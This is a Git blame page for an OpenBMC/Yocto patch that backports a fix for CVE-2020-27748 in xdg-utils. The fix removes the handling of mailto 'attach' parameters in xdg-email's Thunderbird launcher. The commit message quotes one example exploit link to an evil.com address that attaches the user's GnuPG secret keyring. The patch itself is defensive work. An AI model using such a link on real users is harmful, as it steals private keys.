Blame - poky/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch - openbmc/openbmc

blob: 948b9e22e9340d3eeb873ef762b73029533251b6 [file] [log] [blame]

Andrew Geissler	5199d83	2021-09-24 16:47:35 -0500	[diff] [blame^]	1	From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
				2	From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
				3	Date: Tue, 18 Aug 2020 16:52:24 +0100
				4	Subject: [PATCH] xdg-email: remove attachment handling from mailto
				5	MIME-Version: 1.0
				6	Content-Type: text/plain; charset=UTF-8
				7	Content-Transfer-Encoding: 8bit
				8
				9	This allows attacker to extract secrets from users:
				10
				11	mailto:sid@evil.com?attach=/.gnupg/secring.gpg
				12
				13	See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
				14	and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
				15
				16	Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
				17	---
				18	scripts/xdg-email.in \| 7 +------
				19	1 file changed, 1 insertion(+), 6 deletions(-)
				20
				21	Upstream-Status: Backport
				22	CVE: CVE-2020-27748
				23
				24	diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
				25	index 6db58ad..5d2f4f3 100644
				26	--- a/scripts/xdg-email.in
				27	+++ b/scripts/xdg-email.in
				28	@@ -32,7 +32,7 @@ _USAGE
				29
				30	run_thunderbird()
				31	{
				32	- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
				33	+ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
				34	THUNDERBIRD="$1"
				35	MAILTO=$(echo "$2" \| sed 's/^mailto://')
				36	echo "$MAILTO" \| grep -qs "^?"
				37	@@ -48,7 +48,6 @@ run_thunderbird()
				38	BCC=$(/bin/echo -e $(echo "$MAILTO" \| grep '^bcc=' \| sed 's/^bcc=//;s/%$..$/\\x\1/g' \| awk '{ printf "%s,",$0 }'))
				39	SUBJECT=$(echo "$MAILTO" \| grep '^subject=' \| tail -n 1)
				40	BODY=$(echo "$MAILTO" \| grep '^body=' \| tail -n 1)
				41	- ATTACH=$(/bin/echo -e $(echo "$MAILTO" \| grep '^attach=' \| sed 's/^attach=//;s/%$..$/\\x\1/g' \| awk '{ printf "%s,",$0 }' \| sed 's/,$//'))
				42
				43	if [ -z "$TO" ] ; then
				44	NEWMAILTO=
				45	@@ -68,10 +67,6 @@ run_thunderbird()
				46	NEWMAILTO="${NEWMAILTO},$BODY"
				47	fi
				48
				49	- if [ -n "$ATTACH" ] ; then
				50	- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
				51	- fi
				52	-
				53	NEWMAILTO=$(echo "$NEWMAILTO" \| sed 's/^,//')
				54	DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
				55	"$THUNDERBIRD" -compose "$NEWMAILTO"
				56	--
				57	GitLab
				58